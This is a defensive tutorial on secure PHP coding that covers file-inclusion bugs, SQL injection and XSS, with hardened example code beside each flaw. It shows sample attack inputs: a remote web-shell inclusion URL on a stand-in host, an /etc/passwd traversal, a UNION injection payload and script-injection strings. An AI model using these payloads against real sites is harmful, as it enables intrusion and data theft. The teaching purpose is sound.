Safe programming on PHP

In this article I want to set out the main principles of safe programming in PHP. What pushed me to write it is that the Internet is full of articles on how to break into sites through holes in PHP scripts, but there is very little advice (and what exists is scattered) on how not to make the mistakes that let a site be broken into. I have divided the article into several parts, each devoted to one type of mistake and an example of how to avoid it. At the end I give some general advice. So, let us begin.



Include-bug


This is a very old bug, known to almost everyone, yet unfortunately still very common. The function include() (and its relative include_once()) attaches additional PHP modules to a script. The most frequent mistake with this function is the code include("$file"), where the variable $file is taken from a parameter of the script (for example, qwe.php?file=index.php). The attacker only has to put a PHP file containing a web shell on some host (http://www.web-hack.ru/download/info.php?go=77) and pass the address of that web shell in the parameter (for example, qwe.php?file=http://web-hack.ru/shell.php). What can save the victim in this situation is a PHP configuration that forbids including files from other servers: allow_url_fopen=off and, from PHP 5.2 on, the separate allow_url_include setting, which is off by default. Note that this only blocks remote files; a local file the web server can read is still includable.

The cure for the include bug is not to pass the name of the file to be included through a request parameter at all. Where the request must choose between pages, let it choose a key and map that key to a file name inside the script, for example with a switch statement:



<?php
$case = $_GET['case'] ?? '';   // $case - the variable passed as the script parameter

switch ($case) {
    case 'news':
        include('news.php');
        break;

    case 'articles':
        include('articles.php');
        break;

    // ... and so on

    default:
        include('index.php');   // if $case holds none of the values listed above, the main page opens
        break;
}


Many naive programmers think that a construction such as include("$file.php") cannot be broken. They are deeply mistaken! First, older PHP versions had the null-byte bug familiar from Perl: a %00 in the parameter cuts the path at the null byte, throwing away the extension (and anything else after the variable). The original text names PHP <= 4.0.3pl1, but in fact include() and the other file functions kept truncating paths at a null byte until PHP 5.3.4. Second, even on a current PHP the attacker can include any other .php file on the same server (provided the script has permission to read it), which is no good either. So remember this advice: whenever possible, NEVER pass variables through request parameters that will later be used in include(). I understand that one can write elaborate filters for such a variable, but, as practice shows, better safe than sorry. Everything said above applies equally to fopen(), require(), require_once() and include_once().


I also recommend setting register_globals=off in the PHP configuration (since version 4.2.0 it is off by default, and the option was removed altogether in PHP 5.4). If your engine is built from modules, and somewhere in a module there is a line include("$file") where $file is assigned not in that module but in the main file, the attacker can request the module file directly in the browser and supply $file as a parameter.
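The following is an added example (not code from the original article) that puts the include bug next to the allow-list fix described above. The page keys (news, articles, index), the pages/ directory and the use of PHP 7.1 or later are assumptions made for illustration.

```php
<?php
// Added example, not code from the original article. It puts the include
// bug beside the allow-list fix. The page names (news, articles, index) and
// the pages/ directory are assumptions made for illustration.

// VULNERABLE: the request parameter flows straight into include().
// ?file=http://evil.example/shell.php pulls in a remote web shell when
// allow_url_include (PHP >= 5.2) or, before that, allow_url_fopen is on;
// even with both off, ?file=../../../etc/passwd reads any local file the
// web server user can open.
function vulnerable_include(): void
{
    $file = $_GET['file'] ?? 'index.php';
    include($file);
}

// STILL VULNERABLE: appending ".php" only narrows the target to other PHP
// files on this server (e.g. ?file=../admin/config). On PHP < 5.3.4 a
// %00 in the parameter also cut the path at the null byte, discarding the
// suffix altogether.
function still_vulnerable_include(): void
{
    $file = $_GET['file'] ?? 'index';
    include("$file.php");
}

// HARDENED: the request selects a key from a fixed map; the file name
// itself never comes from the user. This is the article's switch() as a
// table, which is easier to extend and to audit.
function page_for(?string $case): string
{
    $pages = [
        'news'     => 'pages/news.php',
        'articles' => 'pages/articles.php',
    ];
    // Unknown or missing key: fall back to the main page, as the article's
    // default: branch does.
    return ($case !== null && isset($pages[$case])) ? $pages[$case] : 'pages/index.php';
}

function safe_include(): void
{
    // ?case[]=x would make $_GET['case'] an array; treat anything that is
    // not a string as "no page selected".
    $case = $_GET['case'] ?? null;
    include(page_for(is_string($case) ? $case : null));
}
```

page_for('news') returns 'pages/news.php', while page_for('../../etc/passwd') and page_for(null) both return 'pages/index.php': no user-supplied byte ever becomes part of a path, so neither traversal nor a null byte has anything to act on.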



SQL-injections


More and more coders are making their scripts talk to databases. As a rule the database is MySQL (less often MSSQL). In this article I describe protection for PHP+MySQL, because I do not work with MSSQL, and it gives an attacker far more opportunities than MySQL does. The essence of this type of vulnerability is that, through variables which are passed as script parameters and take part in an SQL query, the attacker can inject SQL code of his own and thereby alter the query sent to the database. I will not go into the principle of SQL injection in detail, only into how to avoid it. Those who want to learn how SQL injections work can read about them here (http://rst.void.ru/texts/sql-inj.txt). A small example:



SELECT * FROM table WHERE user = '$go'


Suppose the variable $go is passed as a script parameter and this SQL command is executed. Everything is fine, except that the attacker can pass user=lamer' as the value (note the quote), closing the condition himself, and then use UNION (this appeared in MySQL 4, so on earlier versions the injection fails) to attach a second SELECT and obtain confidential information from the database (passwords, for example) once he has worked out its structure. If other conditions followed (ones the attacker does not need), he can cut them off easily with "-- " (note the trailing space) or "/*" (in MySQL these begin a comment). In MSSQL, moreover, the attacker could put a ";" (end of command) and append a new command (INSERT, UPDATE, etc.).


To protect against SQL injection we have to filter the variables that go into the SQL command. This is done as follows:

1) Never forget to put values in quotes (this matters for the filtering that follows). That is, user='$go', not user=$go! Even when the variable is a number, its value can still be quoted this way.

2) If the variable is a number, it is secured very easily by casting it to a numeric type with PHP:

$go = (int)$go; or $go = intval($go);

3) If the variable is not a number, we only need to make sure that quotes cannot terminate the string, which is done with mysql_escape_string() (its analogue is addslashes()). The function puts a backslash before each quote (\'). Now even if the attacker tries to inject SQL code he will not get out of the quotes. Two caveats: mysql_escape_string() and addslashes() ignore the connection's character set, so on current PHP use mysqli_real_escape_string() (the mysql_* extension was removed in PHP 7), and better still send the value through a prepared statement (mysqli or PDO), which keeps data and query text apart without any quoting at all.


If you are paranoid, you can additionally filter out the main MySQL functions used in injections: UNION and CHAR. Treat this only as a secondary measure: keyword blacklists are easy to bypass and produce false positives on legitimate input, so they must never replace quoting and escaping (or prepared statements).
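The following added example (not code from the original article) builds the article's query three ways: the vulnerable interpolation, the escaping-based fixes from points 2) and 3) above, and a prepared statement. A table `users` with columns `id`, `user` and `pass`, an open mysqli connection in $db, and the mysqlnd driver (needed for get_result()) are assumptions for illustration.

```php
<?php
// Added example, not code from the original article. It builds the
// article's query three ways. Table `users` with columns `id`, `user`,
// `pass` and an open mysqli connection $db are assumptions for illustration.

// VULNERABLE: $go is interpolated unescaped, exactly as in the article.
function vulnerable_query(string $go): string
{
    return "SELECT id, user, pass FROM users WHERE user = '$go'";
}

// Constructed attacker input: the quote closes the string, UNION appends a
// second SELECT with the same column count, and "-- " comments out the
// dangling quote that the original query leaves behind.
$payload = "lamer' UNION SELECT id, user, pass FROM users -- ";
echo vulnerable_query($payload), "\n";

// Numeric parameter: casting to int leaves nothing an attacker can inject.
function query_by_id($id): string
{
    $id = (int) $id;
    return "SELECT id, user, pass FROM users WHERE id = $id";
}

// String parameter: escape with the connection's character set. Prefer
// mysqli_real_escape_string() over mysql_escape_string()/addslashes(),
// which do not know the charset (and the mysql_* extension is gone in PHP 7).
function query_by_user(mysqli $db, string $go): string
{
    $go = mysqli_real_escape_string($db, $go);
    return "SELECT id, user, pass FROM users WHERE user = '$go'";
}

// Best: a prepared statement. Query text and value travel separately, so
// no quoting trick can change the statement's structure.
function find_user(mysqli $db, string $go): ?array
{
    $stmt = $db->prepare('SELECT id, user, pass FROM users WHERE user = ?');
    $stmt->bind_param('s', $go);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}
```

With the constructed payload, vulnerable_query() yields SELECT id, user, pass FROM users WHERE user = 'lamer' UNION SELECT id, user, pass FROM users -- ' and returns every row of the table. query_by_user() turns the same payload into user = 'lamer\' UNION SELECT ... -- ', a harmless string comparison, and find_user() never builds a query string from the input at all.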



Advice


1) Do not create configuration files that can be read from the web. A config should be placed above the web server's document root, or kept in a file type that cannot be fetched by a browser (for example, *.inc is not executed as a PHP script on every web server and is then simply served as a text file). So give such files the *.php extension.

2) Never make the password for the SQL database the same as the FTP password. If your hosting sets them identical by default, demand that the hoster make them different: if an attacker obtains a web shell on the server and reads the config with the SQL password, he also gets FTP access.

3) Hash all passwords for the various closed areas with dedicated functions, for example md5(). If the attacker obtains a database of such hashes, recovering the passwords is harder. Today a bare md5() is no longer enough: unsalted digests are cracked quickly with precomputed tables and GPUs, so use a salted, slow hash, which PHP provides through password_hash() and password_verify() (PHP 5.5+).

4) Follow PHP updates (http://www.php.net) and update promptly when a new stable version is released, because vulnerabilities can lurk not only in PHP code but in the language interpreter itself (I think everyone remembers PHP 4.0.2-4.0.7, which allowed a web shell to be opened remotely).

5) Where possible, give configuration files holding passwords uncommon names (cfg.php and the like rather than config.php or conf.php); this hinders an attacker who searches the server's files for configs (find / -name 'conf*').

6) Do not neglect the possibility of HTTP authentication implemented in PHP, especially if it cannot be done at the Apache level (.htaccess and .htpasswd). You can read more about this and other kinds of authentication in the article series "Authorization of access" (http://www.web-hack.ru/books/books.php?go=37).

7) Where possible, keep PHP in safe mode (safe_mode=on). I also advise disabling the initialisation of global variables (register_globals=off) and the ability of fopen() to open URLs from the web (allow_url_fopen=off). Dangerous functions can also be forbidden:

disable_functions=phpinfo, system, passthru

Note that safe_mode and register_globals were removed in PHP 5.4; disable_functions and allow_url_fopen still work on current versions, and allow_url_include should be off as well.

8) If you write a guestbook or the like, do not forget to filter tags in all form fields (nickname, e-mail, etc.) with htmlspecialchars(). If tags are needed in the message body, it is better to implement your own (of the [B][/B] kind) than to write filters that try to forbid the unwanted ones.

9) Encode your PHP sources, and especially the configs, with Zend's encoder (http://www.zend.com; the encoded files run under Zend Optimizer). Bear in mind that encoding only hides the source from a casual reader; it does not replace correct file permissions.
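The following added example (not code from the original article or from the "Authorization of access" series it links to) implements the HTTP authentication of advice 6 in PHP, with the password checked against a salted hash as a modern reading of advice 3. The user list, realm name and password are constructed for the example, and PHP 5.5 or later is assumed for password_hash()/password_verify().

```php
<?php
// Added example, not code from the original article. HTTP Basic
// authentication done in PHP (advice 6) with the password checked against a
// salted hash (advice 3). User list, realm and password are constructed.
//
// password_hash()/password_verify() (PHP 5.5+) are used instead of md5():
// bcrypt is salted and slow, so a leaked table cannot be cracked with a
// precomputed table the way unsalted md5 digests can.

function users(): array
{
    // In a real application the hashes come from the database.
    return [
        'admin' => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
    ];
}

// Returns the authenticated login, or null on missing or invalid credentials.
function check_basic_auth(?string $user, ?string $pass, array $users): ?string
{
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('dummy', PASSWORD_DEFAULT);
    }
    if ($user === null || $pass === null) {
        return null;
    }
    // Verify against a dummy hash for unknown users so that the response
    // time does not reveal which logins exist.
    $hash = $users[$user] ?? $dummy;
    $ok = password_verify($pass, $hash);
    return ($ok && isset($users[$user])) ? $user : null;
}

function require_auth(): string
{
    $who = check_basic_auth(
        $_SERVER['PHP_AUTH_USER'] ?? null,
        $_SERVER['PHP_AUTH_PW'] ?? null,
        users()
    );
    if ($who === null) {
        header('WWW-Authenticate: Basic realm="Closed zone"');
        header('HTTP/1.0 401 Unauthorized');
        echo 'Authorization required';
        exit;
    }
    return $who;
}

$who = require_auth();
echo 'Welcome, ', htmlspecialchars($who, ENT_QUOTES, 'UTF-8');
```

PHP_AUTH_USER and PHP_AUTH_PW are filled in when PHP runs as an Apache module; under CGI/FastCGI the Authorization header is not passed through unless the server is configured to do so. Basic authentication sends the password in the clear on every request, so use it only over HTTPS.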
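The following added example (not code from the original article) is advice 8 in code: every user-supplied guestbook field goes through htmlspecialchars(), and formatting is offered through a small BB-code allow-list that is translated to HTML only after escaping. The field names, the BB-code set and the hostile entry are constructed for the example.

```php
<?php
// Added example, not code from the original article. Advice 8 in code:
// escape every user-supplied field, then translate a fixed set of BB-codes
// to HTML. Field names, BB-code set and the sample entry are constructed.

function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function bbcode_to_html(string $text): string
{
    $safe = esc($text);   // escape first: nothing from the user is HTML
    $rules = [
        '~\[b\](.*?)\[/b\]~is' => '<b>$1</b>',
        '~\[i\](.*?)\[/i\]~is' => '<i>$1</i>',
        // Only http(s) links; "javascript:" and friends never match. After
        // esc() the text contains no raw quotes, so the href cannot be
        // broken out of.
        '~\[url=(https?://[^\s\]]+)\](.*?)\[/url\]~is' => '<a href="$1" rel="nofollow">$2</a>',
    ];
    return nl2br(preg_replace(array_keys($rules), array_values($rules), $safe));
}

function render_entry(array $e): string
{
    return '<div class="entry"><b>' . esc($e['nick']) . '</b> &lt;' . esc($e['email']) . '&gt;<br>'
         . bbcode_to_html($e['body']) . '</div>';
}

// Constructed hostile entry: script in the nickname, an attribute break-out
// attempt in the e-mail, a javascript: URL and a raw tag in the body.
$entry = [
    'nick'  => '<script>alert(1)</script>',
    'email' => 'x@example.com" onmouseover="alert(2)',
    'body'  => "[b]hello[/b] [url=javascript:alert(3)]click[/url]\n<img src=x onerror=alert(4)>",
];
echo render_entry($entry);
```

Every angle bracket and quote in the entry is rendered as text, [b]hello[/b] becomes bold, and the javascript: link stays as literal BB-code because it does not match the http(s) pattern. Escaping before the BB-code pass is what makes the allow-list safe: the replacements only ever insert tags written in the code, never characters that came from the user.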